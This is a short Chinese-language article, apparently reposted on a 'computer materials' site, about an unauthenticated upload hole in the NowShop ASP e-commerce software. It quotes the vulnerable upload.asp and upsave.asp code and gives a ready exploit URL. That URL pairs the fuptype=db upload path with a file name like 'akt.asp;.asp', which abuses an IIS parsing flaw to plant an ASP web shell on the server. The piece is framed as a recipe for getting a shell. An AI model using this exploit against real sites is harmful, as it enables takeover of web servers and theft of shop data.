NowShop直接上传获SHELL网站安全 -电脑资料

电脑资料 时间:2019-01-01 我要投稿
【www.unjs.com - 电脑资料】

   

    漏洞出在upload.asp这个页面,

NowShop直接上传获SHELL网站安全

    没任何验证

   

    <%

    session("fuptype")=request("fuptype")

    session("fupname")=request("fupname")

    session("frmname")=request("frmname")

    Server.ScriptTimeOut=99999

    %>

   

    NowShop直接上传获SHELL网站安全 -电脑资料

   

   

                             //还是调用的upsave.asp

    请选择要上传的文件:

   

   

    、、、、、、、、、

   

    下面看upsave.asp ,还是没验证 ,不过有些版本加了文件限制,不过配合iis那个就完美了

    if file.fileSize>0 then

    filename=fupname+"."                                           //这个地方

    filenameend=file.filename

    filenameend=split(filenameend,".")

    n=UBound(filenameend)

    filename=filename&filenameend(n)

    if fuptype<>"db" then

    if file.fileSize>200000 then

    response.write ""

    response.end

    end if

    end if

    if fuptype="adv" or fuptype="pic" then

    if LCase(filenameend(n))<>"gif" and LCase(filenameend(n))<>"jpg" and LCase(filenameend(n))<>"swf" and LCase(filenameend(n))<>"htm" then

    response.write ""

    response.end

    end if

    end if

    if fuptype="adv" then

    savepath="../images/adv/"&filename

    elseif fuptype="pic" then

    savepath="../pic/digi/"&filename

    elseif fuptype="pic1" then

    savepath="../pic/digi1/"&filename

    elseif fuptype="link" then

    savepath="../images/links/"&filename

    elseif fuptype="db" then

    savepath="./"&filename

    下面漏洞利用页面

    http://127.0.0.1/admin/upload.asp?fuptype=db&fupname=akt.asp;.asp&frmname=akt.asp

    其中akt.asp;.asp就是利用iis解析漏洞,

电脑资料

NowShop直接上传获SHELL网站安全》(https://www.unjs.com)。

最新文章